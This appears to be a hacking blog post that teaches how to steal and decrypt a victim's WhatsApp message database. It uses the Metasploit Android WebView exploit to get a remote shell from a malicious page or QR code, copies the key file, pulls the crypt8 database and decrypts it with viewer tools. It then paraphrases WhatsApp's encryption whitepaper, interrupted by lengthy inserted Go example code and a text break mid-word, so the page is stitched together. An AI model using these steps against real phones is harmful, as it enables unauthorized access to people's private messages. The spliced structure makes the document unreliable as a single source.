Open Technation: Small Blog of Big Hack Guides and Best IT-Ebooks Handpicked from the Internet<br />
(2018 Updated) WhatsApp Database Stealing and Decrypting using Kali Linux (published 2017-11-27, updated 2018-01-26; author: Anonymous)<div dir="ltr" style="text-align: left;" trbidi="on">
Required: Kali Linux with Metasploit <br />
Windows 7 or better<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieE6XpMuCle1UIdAp7sSvvpV46iYkgvHIUZaoL6aICRw89ZnFh0YKfQrhlcX_KA6czv5F4V4relLJZGKYI05ViXJgN1t6WNZM0MELoPCcTlxbr2jL73jxv_zpDfgGf77My5b_nnIfqBR1k/s1600/1280x720-s-.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieE6XpMuCle1UIdAp7sSvvpV46iYkgvHIUZaoL6aICRw89ZnFh0YKfQrhlcX_KA6czv5F4V4relLJZGKYI05ViXJgN1t6WNZM0MELoPCcTlxbr2jL73jxv_zpDfgGf77My5b_nnIfqBR1k/s320/1280x720-s-.jpg" width="320" /></a></div>
<br />
<br />
Here we're going to use the Android WebView addJavascriptInterface vulnerability.<br />
<div style="text-align: justify;">
Around 70% of all Android devices in the
field are subject to a Javascript exploit that could allow an attacker
remote access to your phone by doing nothing more than surfing to a
malicious page or scanning in a malicious QR Code.</div>
<div style="text-align: justify;">
Called the “Android WebView
addJavascriptInterface Vulnerability”, it works when untrusted
Javascript code is executed by a WebView on Android devices.</div>
<div style="text-align: justify;">
And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!</div>
<div style="text-align: justify;">
This month Rapid7 added the exploit as a <a href="http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface" target="_blank">Metasploit Module</a>, so let’s take a look at it using Kali Linux and Metasploit:</div>
<div style="text-align: justify;">
1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.</div>
<div style="text-align: justify;">
2. Type “use exploit/android/browser/webview_addjavascriptinterface”.</div>
<div style="text-align: justify;">
3. Then type, “show options” to see what needs to be set:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/use-exploit.png"><img alt="Use Exploit" class="alignnone size-full wp-image-5528" height="127" src="https://cyberarms.files.wordpress.com/2014/02/use-exploit.png?w=497&h=127" width="497" /></a></div>
<div style="text-align: justify;">
For the most part, you are good to go.
You can turn on SSL if you want, change the port or host address if you
want. But one variable I did change was URIPATH. By default it is
random, so I changed it to something easier to type in.</div>
<div style="text-align: justify;">
“Security” sounded reassuring.</div>
<div style="text-align: justify;">
4. Enter, “set URIPATH Security”:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/set-uripath-exploit.png"><img alt="Set UriPath Exploit" class="alignnone size-full wp-image-5529" height="32" src="https://cyberarms.files.wordpress.com/2014/02/set-uripath-exploit.png?w=497&h=32" width="497" /></a></div>
<div style="text-align: justify;">
5. Finally, type “exploit”:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/exploit.png"><img alt="Exploit" class="alignnone size-full wp-image-5530" src="https://cyberarms.files.wordpress.com/2014/02/exploit.png?w=497" /></a></div>
<div style="text-align: justify;">
A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.</div>
<div style="text-align: justify;">
Now if a vulnerable Android device surfs to our Metasploit module, sitting at <i><b>192.168.1.16:8080/Security</b> </i>in this demo, you get a remote session:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/session-created.png"><img alt="Session created" class="alignnone size-full wp-image-5531" height="60" src="https://cyberarms.files.wordpress.com/2014/02/session-created.png?w=497&h=60" width="497" /></a></div>
<div style="text-align: justify;">
Now just connect to the session using “sessions -i 1”:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/interacting-with-session.png"><img alt="Interacting with session" class="alignnone size-full wp-image-5532" height="36" src="https://cyberarms.files.wordpress.com/2014/02/interacting-with-session.png?w=497&h=36" width="497" /></a></div>
<div style="text-align: justify;">
And that is it! You are connected to the Android device.</div>
<div style="text-align: justify;">
But on one Android Tablet that I tested,
something didn’t seem right. It allowed me to run some Linux commands
but not others. I could use “pwd” to see the current directory that I
was in, and I could surf to other directories with “cd”, but the “ls”
and other commands would not work:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/ls-not-found.png"><img alt="LS not found" class="alignnone size-full wp-image-5533" src="https://cyberarms.files.wordpress.com/2014/02/ls-not-found.png?w=497" /></a></div>
<div style="text-align: justify;">
Whenever I ran “ls” to view the files in the directory, I would get a “&lt;stdin&gt;[2]: ls: not found” error.</div>
<div style="text-align: justify;">
A quick check of the path with “echo $PATH” revealed that no path was set:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/echo-path.png"><img alt="Echo Path" class="alignnone size-full wp-image-5534" src="https://cyberarms.files.wordpress.com/2014/02/echo-path.png?w=497" /></a></div>
<div style="text-align: justify;">
So I set it by typing, “export PATH=/system/bin:$PATH”:</div>
<div style="text-align: justify;">
Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:</div>
<div style="text-align: justify;">
<a href="https://cyberarms.files.wordpress.com/2014/02/export-path.png"><img alt="export path" class="alignnone size-full wp-image-5535" src="https://cyberarms.files.wordpress.com/2014/02/export-path.png?w=497" /></a></div>
<div style="text-align: justify;">
As you can see, I had a complete remote shell to the Android device.</div>
<div style="text-align: justify;">
All I had to do was visit a malicious
page using the built in Browser and the exploit ran with no further
warning or input from the Android device. To make matters worse, the URL
could be printed as a QR Code so that once it is scanned, it
automatically goes to the malicious page for true “click and pwn”.</div>
<div style="text-align: justify;">
So what can you do to protect yourself against this type of attack?</div>
<div style="text-align: justify;">
The exploit only works on versions of Android &lt; 4.2. Which apparently is 70% of current devices…</div>
<div style="text-align: justify;">
Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.</div>
<div style="text-align: justify;">
Also, never scan in QR Codes from unknown sources.</div>
<div style="text-align: justify;">
But I did notice that one device I tested
wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I
remembered that the Android Browser did have an update that I downloaded
before testing.</div>
<div style="text-align: justify;">
Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.</div>
<div style="text-align: justify;">
As you can see, we have root access to the Android device. To decrypt the WhatsApp database you first need its key file, which lives at <b><span class="file">/data/data/com.whatsapp/files/key</span></b>. Copy it with this command:</div>
<pre class="prettyprint lang-sh">cp /data/data/com.whatsapp/files/key /sdcard</pre>
<div style="text-align: justify;">
Now that you have the key file, pull the database file with this command:</div>
<pre class="prettyprint lang-sh">pull /sdcard/WhatsApp/Databases/msgstore.db.crypt8</pre>
<div style="text-align: justify;">
With the key file and the database in hand, your work is almost complete. Switch over to a Windows machine and download <a href="http://andreas-mausch.github.io/whatsapp-viewer/" target="_blank">WhatsApp Viewer</a>. Once downloaded, give it the stolen Crypt8 database file and the key file and you can view the messages, even the images. If you don't want to download a tool, go to <a href="http://whatcrypt.com/?cmd=_cryptkey#.VoS0l0_K7IU" target="_blank">http://whatcrypt.com/</a> and upload your key file and database; once it's decrypted you can download it as simple HTML.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA8aICh3-DmSjM7SYJYKHyVbmg0H_saUBCDGcpTDZnojar6HIoJFEsyElOqipRjJwatkG99gesCe__T609rkkCxrQfzxG-xhiyUI2oUgqesRbDVYYibkqLgPUSWtyEkR_kTJVKc55Uzru_/s1600/shot-20151231-1874-j0e126.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA8aICh3-DmSjM7SYJYKHyVbmg0H_saUBCDGcpTDZnojar6HIoJFEsyElOqipRjJwatkG99gesCe__T609rkkCxrQfzxG-xhiyUI2oUgqesRbDVYYibkqLgPUSWtyEkR_kTJVKc55Uzru_/s320/shot-20151231-1874-j0e126.jpeg" width="190" /></a></div>
<div style="text-align: justify;">
More About WhatsApp Database and How to Hack WhatsApp using Kali Linux<br />
<br />
<div style="text-align: justify;">
This provides a technical explanation of WhatsApp’s end-to-end encryption system.</div>
<div style="text-align: justify;">
WhatsApp Messenger allows people to exchange messages (including chats, group chats, images, videos, voice messages and files) and make WhatsApp calls around the world. WhatsApp messages and calls between a sender and receiver that use WhatsApp client software released after March 31, 2016 are end-to-end encrypted.</div>
<div style="text-align: justify;">
The Signal protocol, designed by Open Whisper Systems, is the basis for WhatsApp’s end-to-end encryption. This end-to-end encryption protocol is designed to prevent third parties and WhatsApp from having plaintext access to messages or calls. What’s more, even if encryption keys from a user’s device are ever physically compromised, they cannot be used to go back in time to decrypt previously transmitted messages. This document gives an overview of the Signal protocol and its use in WhatsApp.</div>
<div style="text-align: justify;">
<b>Public Key Types</b></div>
<ul>
<li><b>Identity Key Pair</b> – A long-term Curve25519 key pair, generated at install time.</li>
<li><b>Signed Pre Key</b> – A medium-term Curve25519 key pair, generated at install time, signed by the Identity Key, and rotated on a periodic timed basis.</li>
<li><b>One-Time Pre Keys</b> – A queue of Curve25519 key pairs for one time use, generated at install time, and replenished as needed.</li>
</ul>
<div style="text-align: justify;">
<b>Session Key Types</b></div>
<ul>
<li><b>Root Key</b> – A 32-byte value that is used to create Chain Keys.</li>
<li><b>Chain Key</b> – A 32-byte value that is used to create Message Keys.</li>
<li><b>Message Key</b> – An 80-byte value that is used to encrypt message contents. 32 bytes are used for an AES-256 key, 32 bytes for a HMAC-SHA256 key, and 16 bytes for an IV.</li>
</ul>
<div style="text-align: justify;">
<b>Client Registration</b></div>
<div style="text-align: justify;">
At registration time, a WhatsApp client transmits its public Identity Key, public Signed Pre Key (with its signature), and a batch of public One-Time Pre Keys to the server. The WhatsApp server stores these public keys associated with the user’s identifier. At no time does the WhatsApp server have access to any of the client’s private keys.</div>
<div style="text-align: justify;">
<b>Initiating Session Setup</b></div>
<div style="text-align: justify;">
To communicate with another WhatsApp user, a WhatsApp client first needs to establish an encrypted session. Once the session is established, clients do not need to rebuild a new session with each other until the existing session state is lost through an external event such as an app reinstall or device change.</div>
<div style="text-align: justify;">
To establish a session:</div>
<ol>
<li>The initiating client (“initiator”) requests the public Identity Key, public Signed Pre Key, and a single public One-Time Pre Key for the recipient.</li>
<li>The server returns the requested public key values. A One-Time Pre Key is only used once, so it is removed from server storage after being requested. If the recipient’s latest batch of One-Time Pre Keys has been consumed and the recipient has not replenished them, no One-Time Pre Key will be returned.</li>
<li>The initiator saves the recipient’s Identity Key as I<sub>recipient</sub>, the Signed Pre Key as S<sub>recipient</sub>, and the One-Time Pre Key as O<sub>recipient</sub>.</li>
<li>The initiator generates an ephemeral Curve25519 key pair, E<sub>initiator</sub>.</li>
<li>The initiator loads its own Identity Key as I<sub>initiator</sub>.</li>
<li>The initiator calculates a master secret as master_secret = ECDH(I<sub>initiator</sub>, S<sub>recipient</sub>) || ECDH(E<sub>initiator</sub>, I<sub>recipient</sub>) || ECDH(E<sub>initiator</sub>, S<sub>recipient</sub>) || ECDH(E<sub>initiator</sub>, O<sub>recipient</sub>). If there is no One-Time Pre Key, the final ECDH is omitted.</li>
<li>The initiator uses HKDF to create a Root Key and Chain Keys from the master_secret.</li>
</ol>
<div style="text-align: justify;">
<b>Receiving Session Setup</b></div>
<div style="text-align: justify;">
After building a long-running encryption session, the initiator can immediately start sending messages to the recipient, even if the recipient is offline. Until the recipient responds, the initiator includes the information (in the header of all messages sent) that the recipient requires to build a corresponding session. This includes the initiator’s E<sub>initiator</sub> and I<sub>initiator</sub>.</div>
<div style="text-align: justify;">
When the recipient receives a message that includes session setup information:</div>
<ol>
<li>The recipient calculates the corresponding master_secret using its own private keys and the public keys advertised in the header of the incoming message.</li>
<li>The recipient deletes the One-Time Pre Key used by the initiator.</li>
<li>The recipient uses HKDF to derive a corresponding Root Key and Chain Keys from the master_secret.</li>
</ol>
<div style="text-align: justify;">
<b>Exchanging Messages</b></div>
<div style="text-align: justify;">
Once a session has been established, clients exchange messages that are protected with a Message Key using AES256 in CBC mode for encryption and HMAC-SHA256 for authentication. The Message Key changes for each message transmitted, and is ephemeral, such that the Message Key used to encrypt a message cannot be reconstructed from the session state after a message has been transmitted or received.</div>
<div style="text-align: justify;">
The Message Key is derived from a sender’s Chain Key that “ratchets” forward with every message sent. Additionally, a new ECDH agreement is performed with each message roundtrip to create a new Chain Key. This provides forward secrecy through the combination of both an immediate “hash ratchet” and a round trip “DH ratchet.”</div>
<div style="text-align: justify;">
<b>Calculating a Message Key from a Chain Key</b></div>
<div style="text-align: justify;">
Each time a new Message Key is needed by a message sender, it is calculated as:</div>
<ol>
<li>Message Key = HMAC-SHA256(Chain Key, 0x01).</li>
<li>The Chain Key is then updated as Chain Key = HMAC-SHA256(Chain Key, 0x02).</li>
</ol>
<div style="text-align: justify;">
This causes the Chain Key to “ratchet” forward, and also means that a stored Message Key can’t be used to derive current or past values of the Chain Key.</div>
<div style="text-align: justify;">
<b>Calculating a Chain Key from a Root Key</b></div>
<div style="text-align: justify;">
Each time a message is transmitted, an ephemeral Curve25519 public key is advertised along with it. Once a response is received, a new Chain Key and Root Key are calculated as:</div>
<ol>
<li>ephemeral_secret = ECDH(Ephemeral<sub>sender</sub>, Ephemeral<sub>recipient</sub>).</li>
</ol>
<br />
<br />
<span style="font-size: small;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="color: #59595c; font-style: normal; font-variant: normal;">2. Chain Key, Root Key = HKDF(Root Key, ephemeral_secret).<br />A chain is only ever used to send messages from one user, so message keys are not reused. Because of the way Message Keys and Chain Keys are calculated, messages can arrive delayed, out of order, or can be lost entirely without any problems.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Transmitting Media and Other Attachments</span><br />Large attachments of any type (video, audio, images, or files) are also end-to-end encrypted:<br />1. The WhatsApp user sending a message (“sender”) generates an ephemeral 32-byte AES256 key and an ephemeral 32-byte HMAC-SHA256 key.<br />2. The sender encrypts the attachment with the AES256 key in CBC mode with a random IV, then appends a MAC of the ciphertext using HMAC-SHA256.<br />3. The sender uploads the encrypted attachment to a blob store.<br />4. The sender transmits a normal encrypted message to the recipient that contains the encryption key, the HMAC key, a SHA256 hash of the encrypted blob, and a pointer to the blob in the blob store.<br />5. The recipient decrypts the message, retrieves the encrypted blob from the blob store, verifies the SHA256 hash of it, verifies the MAC, and decrypts the plaintext.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Group Messages</span><br />Traditional unencrypted messenger apps typically employ “server-side fan-out” for group messages. A client wishing to send a message to a group of users transmits a single message, which is then distributed N times to the N different group members by the server. This is in contrast to “client-side fan-out,” where a client would transmit a single message N times to the N different group members itself.<br />Messages to WhatsApp groups build on the pairwise encrypted sessions outlined above to achieve efficient server-side fan-out for most messages sent to groups. This is accomplished using the “Sender Keys” component of the Signal Messaging protocol.</span></span></span><br />
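The two ratchets described above, written out as an added example in Go. This is not code from the whitepaper or from libsignal. The hash ratchet is exactly the two HMAC-SHA256 calls the page gives. For the DH ratchet the page only says HKDF(Root Key, ephemeral_secret), so using the Root Key as HKDF salt, the X25519 output as keying material and an empty info string is an assumption, as is the message counter the receiver uses to locate a message in its chain (Signal messages carry one; the page does not mention it). The receiver side shows why delayed or out-of-order messages are not a problem: Message Keys for skipped positions are derived and parked, the Chain Key moves forward regardless, and each key is handed out once. A group Sender Key runs the same hash ratchet on its own Chain Key.

```go
package main

import (
	"bytes"
	"crypto/ecdh"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

func hmacSHA256(key []byte, parts ...[]byte) []byte {
	m := hmac.New(sha256.New, key)
	for _, p := range parts {
		m.Write(p)
	}
	return m.Sum(nil)
}

// Hash ratchet, exactly the two HMAC-SHA256 calls the page gives.
func messageKey(chainKey []byte) []byte   { return hmacSHA256(chainKey, []byte{0x01}) }
func nextChainKey(chainKey []byte) []byte { return hmacSHA256(chainKey, []byte{0x02}) }

// hkdf is RFC 5869 HKDF-SHA256 (extract, then expand). Using the Root Key as salt,
// the ECDH output as keying material and an empty info string is an assumption.
func hkdf(salt, ikm []byte, n int) []byte {
	prk := hmacSHA256(salt, ikm)
	var okm, t []byte
	for i := byte(1); len(okm) < n; i++ {
		t = hmacSHA256(prk, t, []byte{i})
		okm = append(okm, t...)
	}
	return okm[:n]
}

// dhRatchet is the round-trip "DH ratchet": the X25519 agreement between the two
// ephemeral keys is mixed into the Root Key, giving a new Root Key and a fresh Chain Key.
func dhRatchet(rootKey []byte, mine *ecdh.PrivateKey, theirs *ecdh.PublicKey) (newRoot, chainKey []byte, err error) {
	secret, err := mine.ECDH(theirs) // ephemeral_secret
	if err != nil {
		return nil, nil, err
	}
	okm := hkdf(rootKey, secret, 64)
	return okm[:32], okm[32:], nil
}

// receiver holds one receiving chain. Messages are assumed to carry their index n
// in the chain (Signal's do; the page does not mention the counter).
type receiver struct {
	chainKey []byte
	next     int            // index the chain will produce next
	skipped  map[int][]byte // Message Keys parked for positions not yet received
}

// keyFor returns the Message Key for message n, ratcheting past any gap and
// parking the keys it skips. Each key is handed out exactly once.
func (r *receiver) keyFor(n int) ([]byte, error) {
	if k, ok := r.skipped[n]; ok {
		delete(r.skipped, n)
		return k, nil
	}
	if n < r.next {
		return nil, errors.New("message key already consumed (duplicate or replay)")
	}
	for r.next < n { // derive and park the keys for every skipped position
		r.skipped[r.next] = messageKey(r.chainKey)
		r.chainKey, r.next = nextChainKey(r.chainKey), r.next+1
	}
	k := messageKey(r.chainKey)
	r.chainKey, r.next = nextChainKey(r.chainKey), r.next+1
	return k, nil
}

// scenario runs one DH ratchet step from both sides, then delivers three messages
// as 2, 0, 1 followed by a replay of 0. It returns nil only if every check holds.
func scenario() error {
	alice, _ := ecdh.X25519().GenerateKey(rand.Reader) // ephemeral key pairs
	bob, _ := ecdh.X25519().GenerateKey(rand.Reader)
	root := make([]byte, 32) // constructed: the Root Key both sides already share
	rand.Read(root)
	rootA, chainA, errA := dhRatchet(root, alice, bob.PublicKey())
	rootB, chainB, errB := dhRatchet(root, bob, alice.PublicKey())
	if errA != nil || errB != nil || !bytes.Equal(rootA, rootB) || !bytes.Equal(chainA, chainB) {
		return errors.New("DH ratchet: the two sides derived different keys")
	}
	var sent [][]byte // sender side: Message Keys for messages 0, 1, 2 in order
	for ck, i := chainA, 0; i < 3; i++ {
		sent = append(sent, messageKey(ck))
		ck = nextChainKey(ck)
	}
	rx := &receiver{chainKey: chainB, skipped: map[int][]byte{}}
	for _, n := range []int{2, 0, 1} { // delivered late and out of order
		if k, err := rx.keyFor(n); err != nil || !bytes.Equal(k, sent[n]) {
			return fmt.Errorf("message %d: wrong key (%v)", n, err)
		}
	}
	if _, err := rx.keyFor(0); err == nil {
		return errors.New("replayed message 0 was accepted")
	}
	return nil
}

func main() {
	fmt.Println("scenario error:", scenario()) // <nil> when every check holds
}
```

Parked keys are the price of tolerating lost messages: a real client bounds how many it keeps, because an attacker who can drop traffic could otherwise make the receiver derive and store an unbounded number of them.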
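The attachment scheme above (steps 1 to 5), as an added example in Go that is not the whitepaper's or libsignal's code. The blob layout IV || ciphertext || tag, the MAC covering the IV as well as the ciphertext, PKCS#7 padding and the blob pointer string are all assumptions; the page fixes only AES256-CBC with a random IV, HMAC-SHA256 and a SHA256 hash of the uploaded blob. The receiver checks in the order the page gives them, hash first, then MAC, and only then decrypts, so a blob that was swapped or modified in the blob store never reaches AES.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// attachmentRef is what the sender puts inside the normal end-to-end encrypted
// message (step 4). The pointer format is a constructed placeholder.
type attachmentRef struct {
	encKey  []byte // ephemeral 32-byte AES-256 key
	macKey  []byte // ephemeral 32-byte HMAC-SHA256 key
	digest  []byte // SHA-256 of the encrypted blob exactly as uploaded
	pointer string
}

func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(b, bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("bad plaintext length")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding")
	}
	return b[:len(b)-n], nil
}

// encryptAttachment is steps 1-2 plus what steps 3-4 need. The blob is
// IV || AES-256-CBC ciphertext || HMAC-SHA256 tag; the MAC covering the IV as
// well as the ciphertext, and PKCS#7 padding, are assumptions the page does not state.
func encryptAttachment(plain []byte) ([]byte, attachmentRef, error) {
	ref := attachmentRef{encKey: make([]byte, 32), macKey: make([]byte, 32), pointer: "blob://example/attachment-1"}
	iv := make([]byte, aes.BlockSize)
	for _, b := range [][]byte{ref.encKey, ref.macKey, iv} {
		if _, err := rand.Read(b); err != nil {
			return nil, ref, err
		}
	}
	block, err := aes.NewCipher(ref.encKey)
	if err != nil {
		return nil, ref, err
	}
	padded := pkcs7Pad(plain)
	blob := make([]byte, aes.BlockSize+len(padded))
	copy(blob, iv)
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(blob[aes.BlockSize:], padded)
	mac := hmac.New(sha256.New, ref.macKey)
	mac.Write(blob)
	blob = mac.Sum(blob)       // append the tag
	sum := sha256.Sum256(blob) // the hash that travels inside the message
	ref.digest = sum[:]
	return blob, ref, nil
}

// decryptAttachment is step 5 in the order the page gives it: hash, then MAC,
// then decrypt. Nothing reaches AES until both checks pass, so a blob swapped or
// bit-flipped in the blob store is rejected before any plaintext exists.
func decryptAttachment(blob []byte, ref attachmentRef) ([]byte, error) {
	sum := sha256.Sum256(blob)
	if !hmac.Equal(sum[:], ref.digest) {
		return nil, errors.New("blob hash does not match the hash sent in the message")
	}
	if len(blob) < 2*aes.BlockSize+sha256.Size {
		return nil, errors.New("blob too short")
	}
	body, tag := blob[:len(blob)-sha256.Size], blob[len(blob)-sha256.Size:]
	mac := hmac.New(sha256.New, ref.macKey)
	mac.Write(body)
	if !hmac.Equal(mac.Sum(nil), tag) {
		return nil, errors.New("MAC verification failed")
	}
	iv, ct := body[:aes.BlockSize], body[aes.BlockSize:]
	if len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not block aligned")
	}
	block, err := aes.NewCipher(ref.encKey)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

func main() {
	blob, ref, err := encryptAttachment([]byte("constructed sample attachment bytes")) // not a real media file
	if err != nil {
		panic(err)
	}
	pt, err := decryptAttachment(blob, ref)
	fmt.Printf("roundtrip: %q err=%v\n", pt, err)
	blob[aes.BlockSize] ^= 0x01 // flip one ciphertext bit "in the blob store"
	_, err = decryptAttachment(blob, ref)
	fmt.Println("tampered blob:", err)
}
```

Both comparisons use hmac.Equal so the checks take the same time whether the mismatch is in the first byte or the last; the hash check makes the blob store untrusted storage only, while the MAC is what binds the blob to the keys in the message.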
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The first time a WhatsApp group member sends a message to a group:<br />1. The sender generates a random 32-byte Chain Key.<br />2. The sender generates a random Curve25519 Signature Key key pair.<br />3. The sender combines the 32-byte Chain Key and the public key from the Signature Key into a Sender Key message.<br />4. The sender individually encrypts the Sender Key to each member of the group, using the pairwise messaging protocol explained previously.<br />For all subsequent messages to the group:<br />1. The sender derives a Message Key from the Chain Key, and updates the Chain Key.<br />2. The sender encrypts the message using AES256 in CBC mode.<br />3. The sender signs the ciphertext using the Signature Key.<br />4. The sender transmits the single ciphertext message to the server, which does server-side fan-out to all group participants.<br />The “hash ratchet” of the message sender’s Chain Key provides forward secrecy. Whenever a group member leaves, all group participants clear their Sender Key and start over. Note that a group chain has only this hash ratchet; there is no round-trip DH ratchet as in the pairwise case, so a Sender Key stays in use until membership changes and it is replaced.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Call Setup</span><br />WhatsApp calls are also end-to-end encrypted. When a WhatsApp user initiates a call:<br />1. The initiator builds an encrypted session with the recipient (as outlined in Section <i>Initiating Session Setup</i>), if one does not already exist.<br />2. The initiator generates a random 32-byte SRTP master secret.<br />3. The initiator transmits an encrypted message to the recipient that signals an incoming call, and contains the SRTP master secret.<br />4. If the responder answers the call, an SRTP encrypted call ensues.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Verifying Keys</span><br />WhatsApp users additionally have the option to verify the keys of the other users with whom they are communicating so that they are able to confirm that an unauthorized third party (or WhatsApp) has not initiated a man-in-the-middle attack. This can be done by scanning a QR code, or by comparing a 60-digit number. Since the purpose is to detect a key substituted by the server, the comparison has to happen out of band, in person or over a channel WhatsApp does not control; reading the number to each other through WhatsApp itself proves nothing.</span></span></span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;"><span style="color: #59595c; font-style: normal; font-variant: normal;">The QR code contains:<br />1. A version.<br />2. The user identifier for both parties.<br />3. The full 32-byte public Identity Key for both parties.<br />When either user scans the other’s QR code, the keys are compared to ensure that what is in the QR code matches the Identity Key as retrieved from the server.<br />The 60-digit number is computed by concatenating the two 30-digit numeric fingerprints for each user’s Identity Key. To calculate a 30-digit numeric fingerprint:<br />1. Iteratively SHA-512 hash the public Identity Key and user identifier 5200 times.<br />2. Take the first 30 bytes of the final hash output.<br />3. Split the 30-byte result into six 5-byte chunks.<br />4. Convert each 5-byte chunk into 5 digits by interpreting each 5-byte chunk as a big-endian unsigned integer and reducing it modulo 100000.<br />5. Concatenate the six groups of five digits into thirty digits.<br /><span style="color: #39bca8; font-style: normal; font-variant: normal;">Transport Security</span><br />All communication between WhatsApp clients and WhatsApp servers is layered within a separate encrypted channel. On Windows Phone, iPhone, and Android, those end-to-end encryption capable clients use Noise Pipes with Curve25519, AES-GCM, and SHA256 from the Noise Protocol Framework for long running interactive connections. This provides clients with a few nice properties:<br />1. Extremely fast lightweight connection setup and resume.<br />2. Encrypts metadata to hide it from unauthorized network observers. No information about the connecting user’s identity is revealed.<br />3. No client authentication secrets are stored on the server. Clients authenticate themselves using a Curve25519 key pair, so the server only stores a client’s public authentication key. If the server’s user database is ever compromised, no private authentication credentials will be revealed.</span></span></span><br />
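The five fingerprint steps above, as an added example in Go; this is not the whitepaper's or libsignal's code. The page does not fix the byte layout of what is hashed in step 1, so the layout used here (each of the 5200 rounds hashes the previous digest, then the Identity Key, then the identifier) is an assumption, and libsignal lays the input out differently, so the dig

its produced here will not match a real WhatsApp safety number. The page also only says the two 30-digit halves are concatenated; ordering them so both parties compute the same 60-digit string is an assumption as well. The keys and identifiers in main are constructed.

```go
package main

import (
	"crypto/sha512"
	"fmt"
)

const fingerprintIterations = 5200

// numericFingerprint computes one party's 30-digit fingerprint following the five
// steps the page lists. The hashed-input layout (previous digest || Identity Key ||
// identifier each round) is an assumption; the page does not specify it.
func numericFingerprint(identityKey []byte, identifier string) string {
	var digest []byte
	for i := 0; i < fingerprintIterations; i++ { // step 1: iterate SHA-512 5200 times
		h := sha512.New()
		h.Write(digest)
		h.Write(identityKey)
		h.Write([]byte(identifier))
		digest = h.Sum(nil)
	}
	out := make([]byte, 0, 30)
	for i := 0; i < 30; i += 5 { // steps 2-3: first 30 bytes, six 5-byte chunks
		var v uint64
		for _, b := range digest[i : i+5] { // step 4: big-endian unsigned integer ...
			v = v<<8 | uint64(b)
		}
		out = append(out, fmt.Sprintf("%05d", v%100000)...) // ... modulo 100000, zero padded to 5 digits
	}
	return string(out) // step 5: six groups of five digits, thirty digits in all
}

// safetyNumber is the 60-digit number both users compare. Sorting the two halves
// (an assumption; the page only says "concatenating") makes both sides compute
// the same string no matter who is "local".
func safetyNumber(keyA []byte, idA string, keyB []byte, idB string) string {
	a, b := numericFingerprint(keyA, idA), numericFingerprint(keyB, idB)
	if a > b {
		a, b = b, a
	}
	return a + b
}

func main() {
	// Constructed 32-byte "Identity Keys" and identifiers; not real users.
	alice, bob := make([]byte, 32), make([]byte, 32)
	for i := range alice {
		alice[i], bob[i] = byte(i), byte(255-i)
	}
	fmt.Println("Alice fingerprint:", numericFingerprint(alice, "alice@example"))
	fmt.Println("Safety number:    ", safetyNumber(alice, "alice@example", bob, "bob@example"))
}
```

The 5200 iterations are not there for security against an adversary who already knows the key; they slow down an attacker who wants to generate a look-alike key whose fingerprint shares many leading digits with the real one, which is what makes a casual visual comparison meaningful.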
<br />
<span style="color: #39bca8; font-size: 20pt; font-style: normal; font-variant: normal;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-size: small;">Conclusion<br /><span style="color: #59595c; font-style: normal; font-variant: normal;">Messages between WhatsApp users are protected with an end-to-end encryption protocol so that third parties and WhatsApp cannot read them and so that the messages can only be decrypted by the recipient. All types of WhatsApp messages (including chats, group chats, images, videos, voice messages and files) and WhatsApp calls are protected by end-to-end encryption. WhatsApp servers do not have access to the private keys of WhatsApp users, and WhatsApp users have the option to verify keys in order to ensure the integrity of their communication.<br />The Signal protocol library used by WhatsApp is Open Source, available here: https://github.com/whispersystems/libsignal-protocol-java/</span></span></span></span><br />
<br />
<br />
